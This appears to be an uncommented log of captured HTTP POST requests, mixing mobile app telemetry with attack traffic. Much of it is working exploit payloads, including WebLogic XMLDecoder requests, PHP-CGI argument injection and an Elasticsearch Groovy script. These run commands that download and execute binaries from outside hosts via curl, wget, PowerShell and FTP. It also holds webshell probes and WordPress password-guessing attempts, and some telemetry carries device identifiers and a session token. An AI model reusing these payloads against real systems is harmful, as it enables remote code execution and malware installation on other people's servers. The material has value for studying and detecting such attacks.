RqBcxtqcN2ZalzhF9BkS6XoS4W1M+N+2psAguKmVSfVP2S3WeQMpHmLKNjt8VUsxTarMhXuW/A2Ri265O724iDa2JIvEG1Cqs/OIfOcPwRBMhDq9YgG75ASxPurkKWE939Dvtc1CD/+MRQBnjLkWSfBS9UvWP9C081uYAoGYhTfGMN0G0V69LxOwNyvcm5NOZ22zW+nKYP9lbHlYGWOAYPAkDA1rpfqPZVY1ZR97HF+C2tzc2tbR9+BJ4I/kteMlSXg2oxP8qju1vnAMeko88DGXOyPLUwvw3etPgzYM8+247Gj5JPddB7/8BTRDna/JMyv+Mr73CljQurzikAaj14IsN1OmI/CPIuYkVS4fzAc=
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 432
Cache-Control: no-cache
S6FWyImZMt0NKUqnsxagu7YTBCsFVbFlBN64HYzBhpzBdFd0Sjn5llEQL6eAMhKMtYXa3gli4dqEpIoVarPL6XU8O8MHbvtBG1Zj0HzR7SW9Ofa+qGvjoQBk9Kv1vKh3RylYA1SkFuB6qUSd+coXO5+i2Fz3RlbVrJeJSMjEseb+scovQ3ZpdFPXErvg4aj/Wok8FFVtSoAZ7FXtu7Gh3aVym/INTdZzUj4gjzKzMJSea4zhEvBk0bbcXxWJB9+fNCv/E3B3Ket2FjunlUiA7evBeZD96lX4h1uILKMhmnKzNpTFRs6XvfREA0R5a7F0Uso3aCsAvET2brzXNQUd/cBTfs0YOIoMM4ARKI14OL0+w7lmECg15og0NsRZZ+ygZwB/54KBcIHeSGGzca1WBSy87eZTaePhODjJcqYXI0MZtA==
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 372
Cache-Control: no-cache
FKxax4/KYWshH5jXKzoJp/MeUuT5lQq7MEZC+7TxU+6/UdrwBtla/H5SxnYW21+VCd+0WE9+Tgdym91cFYP1lB+F1JBEKjRsPLoZoZQ98Al0eBBHX7XTXtnxVx1NQf7eLWjR7wCnEE19+KCYO7WJyPH6CnRXasfr65+CKHdSsEW7lQaNiu9wcUp3h9q/p3kiKmH2L2oWGuppCddyNSDr7mE3T+ibW19P9vaS5cJAH6vOulNfo1XEr/31K7yjDAkb9yPWl420VZT/mI9lg3fNGBcCuiV0vno1bOpJZozeAV6SGGrT775KZLPgIQaANJWRHuRhafYlS/sVh3FRvMF7K+rEeAtfDJu1fBLJZbazCSb7Nkg6T3ac
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∏ÏÕËÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î;;Y›∆√«∆fl
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
m=die('Hello, Peppa!'.(string)(111111111*9))
POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1494995583805
X-Umeng-Sdk: Android/6.0.4 Subway+rush%2F1.1.1+MI+4LTE%2F4.4.4+BE6EA616F4A88C79AB737EB2C10FAA27
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 6353
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Ÿ√ßÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îr\0Y›∆√«∆fl
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Length: 574
Content-Type: text/xml; charset=UTF-8
Accept-Encoding: gzip
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>http://83.171.104.73:4444/cve-2017-10271?target=http%3A%2F%2F45.62.210.75%3A7001%2Fwls-wsat%2FCoordinatorPortType</string>
</void>
<void idref="url">
<void id="stream" method = "openStream" />
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://market.xiaomi.com/thm/checkupdate/hashpair HTTP/1.1
Cookie: serviceToken=0QxjFrjieRMkJ7AH4gTZJJB7i/AE4FAwfcvaQeeZRjmYNLpd68wgPP8d8dNjhkPiNUZ19a+uM9QeraZIhcAhHcTGf+v3zPAsinFkt3ZEVhj6ix7LJl1+Jtgx8QOXp//SJY+GqTsKxII7jabjdfPy8ZnNeGf8QpEG290kf3rCW/fUbfA6ShVSenX25U5lEEnHSHUPWgRMTP6GBvDsDxrDew==; cUserId=UmHQgtJ2PWdwXIYZq1PwDfYMMzY
Content-Length: 749
Content-Type: application/x-www-form-urlencoded
Host: market.xiaomi.com
Connection: Keep-Alive
region=ID&fileshash=b7ecfd9e94c62d69fd4e0b42297935c32fc8e25e%3Ab7ecfd9e94c62d69fd4e0b42297935c32fc8e25e%2C70eea0854c3559bf4af76d846859b9849c9d1921%3A70eea0854c3559bf4af76d846859b9849c9d1921%2C717e32293e4252874882f3921ace16c70866e324%3A717e32293e4252874882f3921ace16c70866e324%2C6716077fdd99692ba82bf40223215ac7e1ee2eda%3A6716077fdd99692ba82bf40223215ac7e1ee2eda%2Cece8251b57beeae6d18c2fbb4429079db180132b%3Aece8251b57beeae6d18c2fbb4429079db180132b%2C3c2d73c5f20a4930ec38b82772f1200d08e1b1e4%3A3c2d73c5f20a4930ec38b82772f1200d08e1b1e4&homeOpenCount=31&imei=d772f4a38f690ab2e4ffa54a09eb5c43&version=4.4.4_V7.00.55.00.KXDMICI&system=miui&freshInterval=7794&alpha=false&device=cancro&language=in_ID&isGlobal=true&capability=w%2Cb%2Cs%2Cm%2Cv%3A6&apk=107
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å›Ño'Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÄ5-Y›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 412
Cache-Control: no-cache
BQ26ziYSBwssScj6o+zRvBPugieuDldetA9CSfIYCFocxdeKyUiD0onk5cOCDQ3VZgitXpojKVxY4Q2Fcg/QsskCH+sI97F9f6iZ2YHB7GWg7yBbO8tNI//FYjIoXq8zbBxIhRipFqycKoytY2j0T52gK6nY+SVY27Y12Ur+CddCFbachnK7TM8r4ZI9tN13VmNDSd6PKIhWyfRBon7tfBbcY3e350SRN2j8zCGW44t32VNEo55Xej9ihYMlNi1xQBe59g4NCjZYp9EvGP+nQxh1wvWZtLzr2MPLdvr9JyeIdE4IpecaMBgPmfowps5QaF9wcHSD9RnvWgyx8o96EH7Bs5mhTwA9pjz2bnzWDIL2OHnzMUmZIjW+TUuKC4bwhlHeozjzp6bQPOdSKxByjQHWmqcv
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÖÖ§ŒÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îp2Y›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 392
Cache-Control: no-cache
RPFayNOeYbPbqqZUwxcb5BMCpol/vjnlLccy4adRcvr6PBR38VaLz4kpPsRL0Tq2I0tGySw/Kn9YObSUSbPbHtWLs3IAyIzqxH6wyOOJdrhHIxYYvz1pf1EFpx99jawA4/AHQHUNOU5bE/vuHYScu1Kyfq9RAsNKYWVkivvuB/KhAbHxVH9sRmK4cF3tSCKCnXSK/RErHiU38gUnhaFP51Mrt2V3XZ2GLT9yOqrC8OyYctETGByutT8TZ3YmFrtOXeV8jRSLbEhvQQBKt+6KB01w71IpKwqVZB/HXCaOhSA70beUu6EK+TRIHL4LpqKMXADiMGQD8wtV7apldlObV5ldt1k434TaRqhImM1tNa+ulsq1xSvIEcf5udy+oa3bQdOLag==
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache
log=jamesatchue&pwd=www123
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÁ*4?Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îzûY›∆√«∆fl
POST /sdk HTTP/1.1
Content-Length: 441
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Host: x.x.x.x
Connection: close
<soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 576
Cache-Control: no-cache
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å™≈˜[Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î´5Y›∆√«∆fl
POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked
POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1494830722859
X-Umeng-Sdk: Android/6.0.4 Subway+rush%2F1.1.1+MI+4LTE%2F4.4.4+BE6EA616F4A88C79AB737EB2C10FAA27
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2319
POST /getcfg.php HTTP/1.1
Accept: */*
Cookie: uid=Zd5iHiPget
Host: x.x.x.x
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 60
A=A%0a_POST_SERVICES%3dDEVICE.ACCOUNT%0aAUTHORIZED_GROUP%3d1
POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: -c
Content-Type: application/x-www-form-urlencoded
Content-Length: 175
<? system("cd /tmp ; wget http://46.105.103.169/eu/lul ; curl -O http://46.105.103.169/eu/lul ; fetch http://46.105.103.169/eu/lul ; chmod +x lul ; perl lul ; rm -rf lul"); ?>
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache
log=admin&pwd=1720
POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å˛°[Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îlLY›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 376
Cache-Control: no-cache
EPYMwNLKZ/R3Ztuuv0giHpLOaN2TFcxAB7m3xTBU3XQ6UpxYgyPAD17/Vup9g9yK63Z8aI1KRBwHc+zCceTrLPHBbIrIT4cVWJd5y1q8W1VpR17he6aJtyl5UUmmAms9PGGs44pKpzHst19U51BcQd9DhAk2+xpLrXSItxWdWKEWYL7Elr1ZpOPcsVBtlsUmIZWCpfY2Qo8mYLUmHTDgH/70fW77jbgTwwyM+MzHFDHBdRZAk0N1IMFY+ljE2poAynIZ+cgKVv+kCdld0DScnBTFLXSKQofinafx1H3UHYDMKvqWq1iX74j8qD5Zmji6DKyqVLuYBnfD5YXipA9fgnAwVkQ6q/WcvkuzoQcIU+ApTWlsRsnb3e8=
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å…ùƒ4Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î,¥)Y›∆√«∆fl
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1079
Content-Type: multipart/form-data; boundary=NT8_saayLCsLgfQ9oWEsCn0ipGm-rvOUnOJOwxyP
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--NT8_saayLCsLgfQ9oWEsCn0ipGm-rvOUnOJOwxyP
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--NT8_saayLCsLgfQ9oWEsCn0ipGm-rvOUnOJOwxyP
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
664258
--NT8_saayLCsLgfQ9oWEsCn0ipGm-rvOUnOJOwxyP
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
2f9f1e34634014df979efa738a3f4fcb
--NT8_saayLCsLgfQ9oWEsCn0ipGm-rvOUnOJOwxyP
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--NT8_saayLCsLgfQ9oWEsCn0ipGm-rvOUnOJOwxyP
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--NT8_saayLCsLgfQ9oWEsCn0ipGm-rvOUnOJOwxyP--
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 20
Cache-Control: no-cache
log=admin&pwd=admin3
POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: -c
Content-Type: application/x-www-form-urlencoded
Content-Length: 182
<? system("cd /tmp ; wget http://mafiagalati.hi2.ro/unix ; curl -O http://mafiagalati.hi2.ro/unix ; fetch http://mafiagalati.hi2.ro/unix ; chmod +x unix ; ./unix ; rm -rf unix "); ?>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∂”âÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îıÒY›∆√«∆fl
POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1300
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;@echo open 93.174.93.149&gt;sss.txt&amp;@echo binary&gt;&gt;sss.txt&amp;@echo get /taskhostxz.exe&gt;&gt;sss.txt&amp;@echo quit&gt;&gt;sss.txt&amp;@ftp -s:sss.txt -v -A&amp;@start taskhostxz.exe&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å˙PbÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÏY›∆√«∆fl
POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST http://check.proxyradar.com/azenv.php?auth=149504673575&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://check.proxyradar.com/azenv.php?auth=149454221447&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; ASJB; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 432
Cache-Control: no-cache
VgrjznQWWfJDDxm9dl81yJznfQgtOPyMRTtIvP26y1KZ67hBOqyuEfs6poiTc6ufP9RwrAyZkr3H4xPT1ncp1U0gAqI3z8Mvr/q4WU9YHQ1pVHzudxMhHgSsu4q2j5FSSUvxT43q83iJiotR4+eAniDiEUr9mepA9TWG2qeOxB0D3Bb169kkxQUM0JsxxPCF83EDKLeKUIw8IewdwUV25pFzM/ZhyOXZysplwfgzj0BA0ysbh6oSZHT3gfImHPcw1SYvHcFdCp8ZhSfJ85f76Ga0gSFS5Iqk5vz/IZKz6+kbsjcP3AC/bPK4cd0oWMULINNeddX4Wivm61GFaIa0TRmUoufFOXWED7vtM7yh3X0TG6KjDmuyzcyEZ9FBtfKB4HyOobcqzgy6PqACGtqYDX35xYZ5i3omTfKygIu9opDMXDY=
POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496022803333
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2600
POST http://ssdk.adkmob.com/rp/ HTTP/1.1
Content-Length: 231
Content-Type: text/plain; charset=ISO-8859-1
Host: ssdk.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=17&ac=50&pos=32518&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":3003,"pkg":"com.mopub.banner","des":"","sug":-1}]
POST http://uc.ucweb.com:80/ HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (Linux; U; Opera Mini/7.1.32052/30.3697; id; MI 4LTE Build/KTU84P) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Android 4.4.4; MI 4LTE Build/KTU84P) Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 469
Host: uc.ucweb.com:80
Connection: Keep-Alive
<assign data="0tiawOjp+Yed19SRsLmnksOI0IKwt6ee3Yvdhqy4osXXiYiH5ay30YvLmtru4KqF34nHiq++uZ7aj8uT8eL204jWm968rPbJisuG2uWst9Kd3JvS5uv509ObpPqhutvzq5vJ3+D94/id3JvF5PyqhcyZm9bg/eTOidfUkefv+9SLm8ne3uz+w9Ob2oa0rLfKsdqBjqPp+MiJ1Yye8eL23syZmcHls7Xyrfub3Pb98tXMmYXS7+mqhYfdy5Pj+u7Xi4TL9Must8WD1o3WvKzW976bycP36+WazIrHgqOu+vie34DXvKymlNebyd7e7OTCn4TLgra+pJbeiNyRoePIw4CEy4K4v6ae3oDagbW7upCIgYuEsu+nhc7XjMf19+fC05uH1vWst9Ka3YDXvKzBlKTBs8HLyMbSmf2o/vXpwYi56rCE7ri1h4/QjY6jrLeI0M6Z"/>
POST http://alog.umengcloud.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496046872803
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
